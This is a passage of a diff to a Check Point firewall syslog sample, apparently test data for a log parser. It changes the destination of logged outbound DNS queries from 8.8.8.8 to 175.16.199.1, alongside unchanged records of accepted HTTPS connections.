rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47211"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47211"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.19.196"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42974"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33216"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52151"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33216"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.19.195"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50944"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42675"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47800"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47070"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38626"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42675"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47070"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38626"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9f6,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48538"; service:"443"; service_id:"https"; src:"192.168.1.205"]
 <134>1 2020-03-29T17:25:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9f7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48540"; service:"443"; service_id:"https"; src:"192.168.1.205"]
 <134>1 2020-03-29T17:25:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9f7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48542"; service:"443"; service_id:"https"; src:"192.168.1.205"]
@@ -2859,21 +2859,21 @@
